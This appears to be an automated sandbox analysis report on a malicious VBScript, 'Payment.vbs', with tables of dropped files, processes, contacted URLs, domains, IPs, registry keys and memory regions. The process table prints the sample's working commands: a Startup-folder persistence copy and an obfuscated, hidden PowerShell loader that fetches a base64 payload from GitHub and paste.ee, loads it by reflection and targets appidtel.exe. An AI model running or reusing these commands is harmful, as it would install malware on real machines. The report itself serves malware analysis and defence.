Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Payment.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x10175119, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\62v53-Zo
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aftf20og.0ld.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgk4fqwi.x4e.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihmp413g.tpm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0qqsuzb.sho.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlxdkgty.khd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn4cy3k0.ih1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\ sbv.emariehnip.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k;
hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent
= [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent);
[d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut,
'+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe
([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
|
|
|
|
C:\Windows\SysWOW64\appidtel.exe
|
"C:\Windows\SysWOW64\appidtel.exe"
|
|
|
|
C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe
|
"C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe"
|
|
|
|
C:\Windows\SysWOW64\convert.exe
|
"C:\Windows\SysWOW64\convert.exe"
|
|
|
|
C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe
|
"C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/SKF1O/0
|
188.114.96.3
|
|
|
|
http://www.donante-de-ovulos.biz/6450/?EzrD=UbYh&mzEt0=52WN8KqJ7jnOEIaeyCxqWgP+KtwCoaIDn8AokGilDz2wl3Qo7VTMWMYazPgXvK5QOqLqt5Ti3xVPGgdXo5E4TqsbUcYSzSRqT9OtwmziQ+LYHZobMnJC5bEpbrqa7K8o2xX/TOE=
|
199.59.243.227
|
|
|
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.111.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txth3k;
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 36 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
www.donante-de-ovulos.biz
|
199.59.243.227
|
|
|
|
raw.githubusercontent.com
|
185.199.111.133
|
||
|
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
||
|
ax-0001.ax-msedge.net
|
150.171.28.10
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
199.59.243.227
|
www.donante-de-ovulos.biz
|
United States
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
185.199.111.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4690000
|
unclassified section
|
page execute and read and write
|
|
|
|
49D0000
|
system
|
page execute and read and write
|
|
|
|
3C20000
|
system
|
page execute and read and write
|
|
|
|
38F0000
|
unkown
|
page execute and read and write
|
|
|
|
33F0000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
3440000
|
trusted library allocation
|
page read and write
|
|
|
|
18776280000
|
heap
|
page read and write
|
||
|
3571000
|
heap
|
page read and write
|
||
|
1B5E565F000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA499000
|
heap
|
page read and write
|
||
|
2AAAA41F000
|
heap
|
page read and write
|
||
|
AF7FB4E000
|
stack
|
page read and write
|
||
|
7FFD346C2000
|
trusted library allocation
|
page read and write
|
||
|
B0000
|
unkown
|
page readonly
|
||
|
1B5FF731000
|
heap
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page execute and read and write
|
||
|
CAA000
|
stack
|
page read and write
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
2C12BF9000
|
stack
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
21B42EC9000
|
heap
|
page read and write
|
||
|
1B5E7659000
|
trusted library allocation
|
page read and write
|
||
|
2C125F2000
|
stack
|
page read and write
|
||
|
A852C7E000
|
unkown
|
page readonly
|
||
|
1F60499F000
|
heap
|
page read and write
|
||
|
7FFD345CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AAAA54A000
|
heap
|
page read and write
|
||
|
7EC1000
|
heap
|
page read and write
|
||
|
1B5E8B62000
|
trusted library allocation
|
page read and write
|
||
|
1875E45C000
|
trusted library allocation
|
page read and write
|
||
|
7F41000
|
heap
|
page read and write
|
||
|
1B5FF4EB000
|
heap
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
D2C8EFE000
|
stack
|
page read and write
|
||
|
1B5FF9F0000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
A8523FE000
|
stack
|
page read and write
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
11E0000
|
unkown
|
page read and write
|
||
|
A85277E000
|
unkown
|
page readonly
|
||
|
1B5E894F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
21B3DA8D000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B42E60000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
1F606CC8000
|
trusted library allocation
|
page read and write
|
||
|
A852F7E000
|
unkown
|
page readonly
|
||
|
3610000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E55CF000
|
heap
|
page read and write
|
||
|
260000
|
unkown
|
page readonly
|
||
|
1875C1D5000
|
heap
|
page read and write
|
||
|
2AAA8705000
|
heap
|
page read and write
|
||
|
1F604B10000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A851F7E000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875D9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34702000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA45B000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F616850000
|
trusted library allocation
|
page read and write
|
||
|
21B43190000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA42A000
|
heap
|
page read and write
|
||
|
2AAA862C000
|
heap
|
page read and write
|
||
|
30E4000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875DF68000
|
trusted library allocation
|
page read and write
|
||
|
1F6068A9000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
unkown
|
page readonly
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
21B43040000
|
trusted library allocation
|
page read and write
|
||
|
1875DFBB000
|
trusted library allocation
|
page read and write
|
||
|
2AAA862A000
|
heap
|
page read and write
|
||
|
2AAAA491000
|
heap
|
page read and write
|
||
|
1224000
|
heap
|
page read and write
|
||
|
3025000
|
heap
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
21B431F0000
|
remote allocation
|
page read and write
|
||
|
1B5F756C000
|
trusted library allocation
|
page read and write
|
||
|
1875E39E000
|
trusted library allocation
|
page read and write
|
||
|
A85167E000
|
unkown
|
page readonly
|
||
|
7FFD3488C000
|
trusted library allocation
|
page read and write
|
||
|
335E000
|
stack
|
page read and write
|
||
|
7FFD346C1000
|
trusted library allocation
|
page read and write
|
||
|
1B5F8428000
|
trusted library allocation
|
page read and write
|
||
|
7F36000
|
heap
|
page read and write
|
||
|
3789000
|
direct allocation
|
page execute and read and write
|
||
|
2AAAA45E000
|
heap
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
A8525FE000
|
stack
|
page read and write
|
||
|
1288000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E7271000
|
trusted library allocation
|
page read and write
|
||
|
261000
|
unkown
|
page execute read
|
||
|
3C8C000
|
unclassified section
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
2AAA862D000
|
heap
|
page read and write
|
||
|
5447D4F000
|
stack
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
2FAC000
|
heap
|
page read and write
|
||
|
2AAA86FA000
|
heap
|
page read and write
|
||
|
4A7F000
|
system
|
page execute and read and write
|
||
|
22C2000
|
unkown
|
page read and write
|
||
|
2AAA8742000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA49E000
|
heap
|
page read and write
|
||
|
7FFD346BA000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
unkown
|
page execute and read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
21B42E63000
|
heap
|
page read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
21B3E850000
|
trusted library section
|
page readonly
|
||
|
A8524FE000
|
stack
|
page read and write
|
||
|
2F9D000
|
heap
|
page read and write
|
||
|
7F45000
|
heap
|
page read and write
|
||
|
54469FE000
|
stack
|
page read and write
|
||
|
2F38000
|
heap
|
page read and write
|
||
|
1B5FF5A0000
|
heap
|
page read and write
|
||
|
A85217E000
|
unkown
|
page readonly
|
||
|
5446F7E000
|
stack
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345D6000
|
trusted library allocation
|
page read and write
|
||
|
1F61EB10000
|
heap
|
page execute and read and write
|
||
|
2AAA8625000
|
heap
|
page read and write
|
||
|
2AAAA47B000
|
heap
|
page read and write
|
||
|
7FFD346DA000
|
trusted library allocation
|
page read and write
|
||
|
1B5E8F0A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
1875DF6E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
D2C94FF000
|
stack
|
page read and write
|
||
|
7FFD345F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85267E000
|
unkown
|
page readonly
|
||
|
640000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E56E0000
|
heap
|
page read and write
|
||
|
1F61EA70000
|
heap
|
page execute and read and write
|
||
|
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
|
3729000
|
heap
|
page read and write
|
||
|
2AAAA57B000
|
heap
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
2AAA874A000
|
heap
|
page read and write
|
||
|
2AAA870B000
|
heap
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3456C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C20000
|
direct allocation
|
page read and write
|
||
|
1875C040000
|
heap
|
page read and write
|
||
|
C0000
|
unkown
|
page readonly
|
||
|
1B5E56EA000
|
heap
|
page read and write
|
||
|
18775FD0000
|
heap
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
21B3E870000
|
trusted library section
|
page readonly
|
||
|
2FD4000
|
heap
|
page read and write
|
||
|
A852B7E000
|
unkown
|
page readonly
|
||
|
CAA000
|
stack
|
page read and write
|
||
|
5446CFE000
|
stack
|
page read and write
|
||
|
2AAA8628000
|
heap
|
page read and write
|
||
|
2AAAA585000
|
heap
|
page read and write
|
||
|
1875DA10000
|
heap
|
page execute and read and write
|
||
|
2AAA86FE000
|
heap
|
page read and write
|
||
|
35E5000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2040000
|
unkown
|
page read and write
|
||
|
2AAA870C000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5FF71C000
|
heap
|
page read and write
|
||
|
3870000
|
direct allocation
|
page read and write
|
||
|
2AAA862B000
|
heap
|
page read and write
|
||
|
1875DF71000
|
trusted library allocation
|
page read and write
|
||
|
21B3E302000
|
heap
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
275000
|
unkown
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
3BA1000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
1B5FF406000
|
heap
|
page execute and read and write
|
||
|
21B3E880000
|
trusted library section
|
page readonly
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
5D1A000
|
unclassified section
|
page execute and read and write
|
||
|
865E000
|
stack
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
1000000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34504000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA44B000
|
heap
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
1F6048E0000
|
heap
|
page read and write
|
||
|
1875C0BD000
|
heap
|
page read and write
|
||
|
7FFD34606000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B5E8906000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
AF0013E000
|
stack
|
page read and write
|
||
|
2FC3000
|
heap
|
page read and write
|
||
|
1B5E56F0000
|
trusted library allocation
|
page read and write
|
||
|
A851E7C000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2F99000
|
heap
|
page read and write
|
||
|
3610000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A852BFE000
|
stack
|
page read and write
|
||
|
7FFD3451B000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
D2C8FFF000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B3DA2B000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA40B000
|
heap
|
page read and write
|
||
|
2AAA8490000
|
heap
|
page read and write
|
||
|
21B43120000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A8526FE000
|
stack
|
page read and write
|
||
|
2C12F3F000
|
stack
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
1B5E54B0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
32BF000
|
stack
|
page read and write
|
||
|
1B5E5550000
|
trusted library allocation
|
page read and write
|
||
|
A85139E000
|
stack
|
page read and write
|
||
|
21B42DD0000
|
trusted library allocation
|
page read and write
|
||
|
AF7FE7E000
|
stack
|
page read and write
|
||
|
2040000
|
unkown
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
1875DEBA000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875D990000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
21B42EE4000
|
heap
|
page read and write
|
||
|
1B5E5570000
|
heap
|
page read and write
|
||
|
21B42ED5000
|
heap
|
page read and write
|
||
|
2AAAA46A000
|
heap
|
page read and write
|
||
|
1875DB26000
|
heap
|
page read and write
|
||
|
1F606998000
|
trusted library allocation
|
page read and write
|
||
|
21B42F03000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
20C4000
|
heap
|
page read and write
|
||
|
7FFD346A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
21B42EF6000
|
heap
|
page read and write
|
||
|
A85347D000
|
stack
|
page read and write
|
||
|
21B43050000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
2AAAA65E000
|
heap
|
page read and write
|
||
|
21B3D9B0000
|
trusted library section
|
page read and write
|
||
|
21B3E215000
|
heap
|
page read and write
|
||
|
1B5E55AE000
|
heap
|
page read and write
|
||
|
2AAAA65D000
|
heap
|
page read and write
|
||
|
1F61EB40000
|
heap
|
page read and write
|
||
|
2AAAA488000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD3450D000
|
trusted library allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA584000
|
heap
|
page read and write
|
||
|
3C80000
|
heap
|
page read and write
|
||
|
2FAC000
|
heap
|
page read and write
|
||
|
21B3D970000
|
heap
|
page read and write
|
||
|
491A000
|
unclassified section
|
page execute and read and write
|
||
|
AF7FAC3000
|
stack
|
page read and write
|
||
|
21B3E860000
|
trusted library section
|
page readonly
|
||
|
843C000
|
stack
|
page read and write
|
||
|
2FD7000
|
heap
|
page read and write
|
||
|
21B43030000
|
trusted library allocation
|
page read and write
|
||
|
1B5E55F8000
|
heap
|
page read and write
|
||
|
26E000
|
unkown
|
page readonly
|
||
|
1B5FF716000
|
heap
|
page read and write
|
||
|
2AAAA427000
|
heap
|
page read and write
|
||
|
1480000
|
unkown
|
page readonly
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
21B43120000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
